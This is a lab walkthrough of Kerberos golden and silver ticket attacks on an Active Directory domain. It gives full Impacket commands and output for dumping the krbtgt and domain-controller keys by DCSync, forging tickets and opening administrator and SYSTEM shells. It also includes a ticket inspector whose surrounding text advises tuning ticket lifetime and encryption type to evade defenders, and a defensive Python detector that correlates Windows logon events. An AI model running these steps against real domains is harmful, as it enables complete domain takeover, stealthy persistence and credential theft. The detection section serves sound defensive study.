I. Golden Ticket (Pass-the-Ticket) Attack
In the AS-REP stage of Kerberos authentication, once pre-authentication succeeds the KDC returns a TGT. The TGT's encrypted part (EncTicketPart) is encrypted with the krbtgt account's key, and its authorization-data carries the PAC that describes the user: SID, group membership and the rest of the logon information.
Whoever holds the krbtgt key can therefore forge a PAC with arbitrary privileges and wrap it in a TGT. Because the krbtgt key is the only secret involved, the high-privilege TGT is produced entirely offline, with no connection to the KDC; the KDC only sees the forged TGT when it is later presented in a TGS-REQ.
To create a golden ticket you need:
- the krbtgt account key (AES key or NT hash)
- the domain SID
- the domain name
- the domain user to impersonate, normally a high-privilege account such as the domain administrator
Since the KDC hardening for CVE-2021-42287 (PAC_REQUESTOR), the KDC also checks that the account named in the ticket exists and that its SID matches the PAC, so the impersonated user must be a real account; ticketer.py uses RID 500 by default (-user-id) and puts Domain Admins, Enterprise Admins and the other privileged groups into the PAC through -groups.
Lab environment:
Domain controller: 10.10.4.2 (Win2019-DC1.sec.local)
Domain member host: 10.10.4.21
1. Exploitation with Impacket
Collect the required information
# Get the krbtgt account key (DCSync over DRSUAPI; this needs replication rights, here the domain administrator's password)
(base) ┌──(root㉿Kali)-[~/tools/proxyshell-auto]
└─# /root/.local/bin/secretsdump.py sec.local/administrator:"Az123456@"@10.10.4.2 -just-dc-user sec/krbtgt
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1258230d20deb8fa8c0ee72e014ae813:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:f17ecd5329b2b676b5737a7e40c5cd26337048e048b09663ceef99178afff9d8
krbtgt:aes128-cts-hmac-sha1-96:48387c994c399862ae5ef5a7c86f0c8e
krbtgt:des-cbc-md5:512a436789e32394
[*] Cleaning up...
# Get the domain SID
(base) ┌──(root㉿Kali)-[~/tools/proxyshell-auto]
└─# /root/.local/bin/lookupsid.py sec.local/administrator:"Az123456@"@10.10.4.2
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.10.4.2
[*] StringBinding ncacn_np:10.10.4.2[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2066713137-2133816201-3751750268
498: SEC\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SEC\Administrator (SidTypeUser)
Generate the golden ticket with Impacket (the -aesKey below is the krbtgt aes128 key; the aes256 key works the same way and matches the etype a DC uses by default, while -nthash yields an RC4 TGT that stands out on AES-only domains)
(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/ticketer.py -domain-sid S-1-5-21-2066713137-2133816201-3751750268 -aesKey 48387c994c399862ae5ef5a7c86f0c8e -domain sec.local administrator
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sec.local/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in administrator.ccache
(base) ┌──(root㉿Kali)-[~]
└─# export KRB5CCNAME=administrator.ccache
Try dumping a user's hash with the forged ticket (secretsdump presents the forged TGT to the KDC in a TGS-REQ for the DC's services; a successful DCSync confirms the KDC accepted it)
(base) ┌──(root㉿Kali)-[~]
└─# /usr/local/bin/secretsdump.py -k -no-pass WIN2019-DC1.sec.local -dc-ip 10.10.4.2 -just-dc-user test2
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
sec.local\test2:1164:aad3b435b51404eeaad3b435b51404ee:27d86657f458a28aeed03655ba6a6137:::
[*] Kerberos keys grabbed
sec.local\test2:aes256-cts-hmac-sha1-96:7b12c5416a7492517b399e0b2545c09b8b73cd67521bc470fb4348e4e6a2822c
sec.local\test2:aes128-cts-hmac-sha1-96:e28e2621d5b3e90b71c8e5078fc0f2b1
sec.local\test2:des-cbc-md5:4a6297fe387f7020
[*] Cleaning up...
Try wmiexec (the -just-dc-user switch belongs to secretsdump.py; wmiexec.py rejects it, so only the target is given)
(base) ┌──(root㉿Kali)-[~]
└─# /usr/local/bin/wmiexec.py -k -no-pass WIN2019-DC1.sec.local -dc-ip 10.10.4.2
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sec.local\administrator
C:\>
2. Exploitation with mimikatz
(not covered)
3. Exploitation with Cobalt Strike
(not covered)
II. Silver Ticket (Pass-the-Ticket) Attack
In the TGS-REP stage of Kerberos authentication, after the KDC has checked the client's TGT and the authenticator that proves possession of its session key, the ticket-granting service returns a service ticket (ST) for the requested SPN. The ST's encrypted part is encrypted with the long-term key of the account that owns the SPN (for cifs/host, the machine account), and its authorization-data again carries the PAC describing the user.
Whoever holds that service key can forge an ST carrying a high-privilege PAC and present it straight to the service, without ever contacting the KDC. The service accepts it as long as it does not ask a DC to verify the PAC signature; services running as SYSTEM (including the SMB server) skip that KDC validation by default, which is why cifs is the usual target.
Information needed for a silver ticket:
- the key of the account that owns the target SPN (for a host service, the machine account's NT hash or AES key)
- the target SPN, e.g. cifs/WIN2019-DC1.sec.local
- the domain SID
- the domain name
- the domain user to impersonate
Collect the required information
# Get the DC machine account's key
(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/secretsdump.py sec.local/administrator:"Az123456@"@10.10.4.2 -just-dc-user SEC/WIN2019-DC1\$
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
WIN2019-DC1$:1000:aad3b435b51404eeaad3b435b51404ee:8c0d3761c08f5f0f30d284be3fbcf77b:::
[*] Kerberos keys grabbed
WIN2019-DC1$:aes256-cts-hmac-sha1-96:cca91bb572a359fdf45c570e2a93317244cb1f1facbeabaaea1cde312089bb09
WIN2019-DC1$:aes128-cts-hmac-sha1-96:85061b1b1ba973a86d30ebb5e7396cc1
WIN2019-DC1$:des-cbc-md5:941ab0079204e62a
[*] Cleaning up...
# Domain SID: as obtained above with lookupsid.py, S-1-5-21-2066713137-2133816201-3751750268
1. Impacket
Generate the silver ticket
# The machine account's NT hash is used here, which yields an RC4 ticket; -aesKey with the aes256 key from secretsdump works as well and gives an AES ticket that blends in on domains where RC4 is disabled
(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/ticketer.py -domain-sid S-1-5-21-2066713137-2133816201-3751750268 -nthash 8c0d3761c08f5f0f30d284be3fbcf77b -spn cifs/WIN2019-DC1.sec.local -domain sec.local administrator
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sec.local/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache
(base) ┌──(root㉿Kali)-[~]
└─# export KRB5CCNAME=administrator.ccache
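Before a forged ticket (golden, as generated in section I, or silver, as generated just above) is used it is worth checking what ticketer.py actually wrote: who the client is, which service the ticket is for (krbtgt/SEC.LOCAL for a golden ticket, cifs/... for a silver ticket), which encryption type it carries and how long it is valid. ticketer's default lifetime is ten years (-duration), far beyond the 10-hour domain default, which is itself a detection signal. The script below is an added example, not Impacket code (Impacket's own describeTicket.py and klist -e show the same fields): it parses the ccache v4 layout directly with the Python standard library, walks the DER Ticket only far enough to read its etype, and includes a small builder that produces a constructed sample cache so it runs offline. Run it with administrator.ccache as argument to inspect a real cache.

```python
"""Inspect a Kerberos ccache (v4) such as ticketer.py writes, standard library only.
Layout follows the MIT krb5 ccache v4 format; the Ticket inside is DER."""
import struct
import sys

ETYPES = {3: "des-cbc-md5", 17: "aes128-cts-hmac-sha1-96",
          18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}


def der(tag, content):
    """Encode one DER TLV (short or long definite length)."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


def der_children(buf):
    """Split a DER constructed value into (tag, content) pairs (one-byte tags)."""
    out, i = [], 0
    while i < len(buf):
        tag, ln, i = buf[i], buf[i + 1], i + 2
        if ln & 0x80:                               # long form: 0x8N then N length bytes
            n = ln & 0x7F
            ln = int.from_bytes(buf[i:i + n], "big")
            i += n
        out.append((tag, buf[i:i + ln]))
        i += ln
    return out


def ticket_etype(ticket_der):
    """Ticket ::= [APPLICATION 1] SEQUENCE { tkt-vno [0], realm [1], sname [2],
    enc-part [3] EncryptedData { etype [0] INTEGER, kvno [1], cipher [2] } }."""
    (_, seq_tlv), = der_children(ticket_der)        # [APPLICATION 1] -> SEQUENCE TLV
    (_, fields), = der_children(seq_tlv)            # SEQUENCE -> its [0]..[3] fields
    (_, enc_fields), = der_children(dict(der_children(fields))[0xA3])
    (_, etype), = der_children(dict(der_children(enc_fields))[0xA0])
    return int.from_bytes(etype, "big")


class Reader:
    def __init__(self, data):
        self.data, self.pos = data, 0

    def take(self, n):
        if self.pos + n > len(self.data):
            raise ValueError("truncated ccache")
        self.pos += n
        return self.data[self.pos - n:self.pos]

    def u8(self): return self.take(1)[0]
    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def blob(self): return self.take(self.u32())    # uint32 length + bytes

    def principal(self):
        self.u32()                                  # name-type (present in v4 only)
        count = self.u32()
        realm = self.blob().decode()
        return "/".join(self.blob().decode() for _ in range(count)) + "@" + realm


def parse_ccache(data):
    """Return one dict per credential stored in the cache."""
    r = Reader(data)
    if r.take(2) != b"\x05\x04":
        raise ValueError("only ccache version 4 is handled")
    r.take(r.u16())                                 # header block (deltatime tag)
    r.principal()                                   # default principal
    creds = []
    while r.pos < len(data):
        client, server = r.principal(), r.principal()
        key_etype, _key = r.u16(), r.blob()         # session keyblock
        _auth, start, end, _renew = (r.u32() for _ in range(4))
        r.u8(); flags = r.u32()                     # is_skey, tktflags (not decoded here)
        for _ in range(r.u32()): r.u16(); r.blob()  # addresses
        for _ in range(r.u32()): r.u16(); r.blob()  # authdata
        ticket, _second = r.blob(), r.blob()
        te = ticket_etype(ticket)
        creds.append({"client": client, "server": server,
                      "session_key_etype": ETYPES.get(key_etype, key_etype),
                      "ticket_etype": ETYPES.get(te, te),
                      "lifetime_hours": (end - start) / 3600, "flags": flags})
    return creds


def build_ccache(client, realm, service, key_etype, tkt_etype, start, end):
    """Write a one-credential v4 ccache. Used here only to produce a constructed
    offline sample; the 'cipher' is zero padding, not a real encrypted ticket."""
    def data(b): return struct.pack(">I", len(b)) + b
    def principal(name):
        comps = name.split("/")
        return struct.pack(">II", 1, len(comps)) + data(realm.encode()) + b"".join(data(c.encode()) for c in comps)
    sname = der(0x30, der(0xA0, der(0x02, b"\x02")) +
                der(0xA1, der(0x30, b"".join(der(0x1B, c.encode()) for c in service.split("/")))))
    enc = der(0x30, der(0xA0, der(0x02, bytes([tkt_etype]))) + der(0xA1, der(0x02, b"\x02")) +
              der(0xA2, der(0x04, b"\x00" * 300)))
    ticket = der(0x61, der(0x30, der(0xA0, der(0x02, b"\x05")) + der(0xA1, der(0x1B, realm.encode())) +
                            der(0xA2, sname) + der(0xA3, enc)))
    header = struct.pack(">HHH", 12, 1, 8) + b"\x00" * 8      # headerlen, tag 1 (deltatime), 8 bytes
    cred = (principal(client) + principal(service) + struct.pack(">H", key_etype) + data(b"\x11" * 16) +
            struct.pack(">IIII", start, start, end, end) + b"\x00" + struct.pack(">III", 0, 0, 0) +
            data(ticket) + data(b""))                          # is_skey, flags, 0 addrs, 0 authdata
    return b"\x05\x04" + header + principal(client) + cred


def describe(data):
    return [f"{c['client']} -> {c['server']}: ticket {c['ticket_etype']}, session key "
            f"{c['session_key_etype']}, lifetime {c['lifetime_hours']:.0f} h" for c in parse_ccache(data)]


if __name__ == "__main__":
    if len(sys.argv) > 1:                           # e.g. python3 inspect_ccache.py administrator.ccache
        with open(sys.argv[1], "rb") as f:
            blob = f.read()
    else:                                           # constructed sample: ten-year golden ticket
        blob = build_ccache("administrator", "SEC.LOCAL", "krbtgt/SEC.LOCAL", 18, 18, 0, 87600 * 3600)
    print("\n".join(describe(blob)))
```

A lifetime of 87600 h or a ticket etype of rc4-hmac on an AES-only domain is exactly what a defender would flag, so adjust -duration and the key type before use; the session key etype also tells you which key ticketer chose from the length of the value you passed.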
smbexec (the forged cifs ticket authenticates the SMB session that carries the \pipe\svcctl calls; whoami prints nt authority\system because smbexec runs each command through a service it creates, not because the ticket's PAC claims SYSTEM)
(base) ┌──(root㉿Kali)-[~]
└─# /usr/local/bin/smbexec.py -k -no-pass administrator@WIN2019-DC1.sec.local -dc-ip 10.10.4.2 -debug
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket
[+] StringBinding ncacn_np:WIN2019-DC1.sec.local[\pipe\svcctl]
[+] Using Kerberos Cache: administrator.ccache
[+] Domain retrieved from CCache: SEC.LOCAL
[+] Returning cached credential for CIFS/WIN2019-DC1.SEC.LOCAL@SEC.LOCAL
[+] Using TGS from cache
[+] Executing %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
[+] Executing %COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
nt authority\system
C:\Windows\system32>
III. How golden and silver tickets relate and differ
1. Similarities
- Both abuse Kerberos authentication
- Both are pass-the-ticket attacks: a forged ticket is placed in the client's credential cache and used as if the KDC had issued it
- Both are commonly used for persistence after compromise, since they stay valid until the underlying key is rotated (the krbtgt password twice, or the machine account password)
2. Differences
(1) Scope of access
Golden ticket: a forged high-privilege TGT can be exchanged at the KDC for a service ticket to any service in the domain
Silver ticket: a forged high-privilege ST only works against the service whose key was used, i.e. the SPN given to -spn (other SPNs owned by the same account share that key and are reachable by forging a second ticket)
(2) Encryption key
Golden ticket: encrypted with the krbtgt key (AES key or NT hash; the aes256 key matches what a DC issues by default)
Silver ticket: encrypted with the key of the account that owns the SPN, normally the machine account; this can likewise be the NT hash (RC4 ticket) or the AES key (AES ticket), ticketer.py accepts -nthash or -aesKey together with -spn
(3) Logging
Golden ticket: only the TGT is forged; every service access still needs a TGS-REQ to the KDC, so the DC logs Event 4769 for each service ticket, with no matching 4768 (AS-REQ) for that account and client, which is the main detection signal
Silver ticket: only the ST is forged and the KDC is never contacted, so the DC logs nothing; the only traces are on the target host (Event 4624 with logon type 3, plus whatever the service itself records), and a service running as SYSTEM does not ask the DC to validate the PAC
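The logging asymmetry above is what a detection engineer correlates on. The Python below is an added example, not something from the original page: it runs the two checks over constructed Windows Security events (a normal Kerberos logon, one silver-ticket use and one golden-ticket use; the host names, times and addresses are made up to match the lab). The golden-ticket check looks for a 4769 at a DC with no 4768 for the same account and client address within the maximum TGT lifetime; the silver-ticket check looks for a Kerberos network logon (4624, type 3) on any host with no 4769 issued by a DC for it within the maximum ST lifetime.

```python
"""Correlate DC and member-server Security events to find forged Kerberos tickets.
Golden ticket: TGS request (4769) at the KDC with no AS request (4768) for the same
account and client address. Silver ticket: Kerberos network logon (4624, type 3) on
a host with no service ticket (4769) issued by any DC for it."""
from datetime import datetime, timedelta

# Constructed sample events (not real captures): (timestamp, host, event_id, fields)
EVENTS = [
    # a normal logon: AS-REQ, TGS-REQ for the file server, network logon there
    ("2025-07-01T08:00:00", "WIN2019-DC1", 4768, {"user": "test2", "ip": "10.10.4.21"}),
    ("2025-07-01T08:00:02", "WIN2019-DC1", 4769, {"user": "test2@SEC.LOCAL", "ip": "10.10.4.21", "service": "FS01$"}),
    ("2025-07-01T08:00:03", "FS01", 4624, {"user": "test2", "ip": "10.10.4.21", "logon_type": 3, "package": "Kerberos"}),
    # silver ticket use: SMB logon on the DC, but no DC ever issued a service ticket for it
    ("2025-07-01T10:30:00", "WIN2019-DC1", 4624, {"user": "administrator", "ip": "10.10.4.21", "logon_type": 3, "package": "Kerberos"}),
    # golden ticket use: service ticket requested with a TGT the KDC never issued (no 4768)
    ("2025-07-02T09:15:00", "WIN2019-DC1", 4769, {"user": "administrator@SEC.LOCAL", "ip": "10.10.4.21", "service": "WIN2019-DC1$"}),
    ("2025-07-02T09:15:01", "WIN2019-DC1", 4624, {"user": "administrator", "ip": "10.10.4.21", "logon_type": 3, "package": "Kerberos"}),
]
DCS = {"WIN2019-DC1"}                      # hosts whose 4768/4769 events are in scope
MAX_TICKET_LIFE = timedelta(hours=10)      # default domain policy: TGT and ST lifetime 10 h


def _ts(event):
    return datetime.fromisoformat(event[0])


def _user(fields):
    return fields["user"].split("@")[0].lower()   # 4769 names the client as user@REALM


def _seen(index, user, ip, at, window):
    """True if index holds an entry for (user, ip) within [at - window, at]."""
    return any(u == user and a == ip and at - window <= t <= at for t, u, a in index)


def golden_ticket_candidates(events, dcs=DCS, window=MAX_TICKET_LIFE):
    """4769 at a DC with no 4768 for the same account and client IP inside the
    TGT's maximum lifetime: the TGT that was presented never came from the KDC."""
    as_reqs = [(_ts(e), _user(e[3]), e[3]["ip"]) for e in events if e[2] == 4768 and e[1] in dcs]
    return [(_user(e[3]), e[3]["ip"], e[3]["service"], e[0]) for e in events
            if e[2] == 4769 and e[1] in dcs
            and not _seen(as_reqs, _user(e[3]), e[3]["ip"], _ts(e), window)]


def silver_ticket_candidates(events, dcs=DCS, window=MAX_TICKET_LIFE):
    """Kerberos network logon on any host with no 4769 at a DC for that account
    and client IP inside the ST's maximum lifetime: the ST never came from the KDC."""
    tgs_reqs = [(_ts(e), _user(e[3]), e[3]["ip"]) for e in events if e[2] == 4769 and e[1] in dcs]
    return [(_user(e[3]), e[3]["ip"], e[1], e[0]) for e in events
            if e[2] == 4624 and e[3].get("logon_type") == 3 and e[3].get("package") == "Kerberos"
            and not _seen(tgs_reqs, _user(e[3]), e[3]["ip"], _ts(e), window)]


if __name__ == "__main__":
    for hit in golden_ticket_candidates(EVENTS):
        print("possible golden ticket: user=%s client=%s service=%s at %s" % hit)
    for hit in silver_ticket_candidates(EVENTS):
        print("possible silver ticket: user=%s client=%s host=%s at %s" % hit)
```

In a real deployment the logs of every DC in the domain must be pooled (a TGS-REQ can go to any of them), clocks must be synchronised, renewals (4770) and TGTs issued before the start of the data need an exception, and the window has to follow the domain's actual Kerberos policy rather than the 10-hour default assumed here.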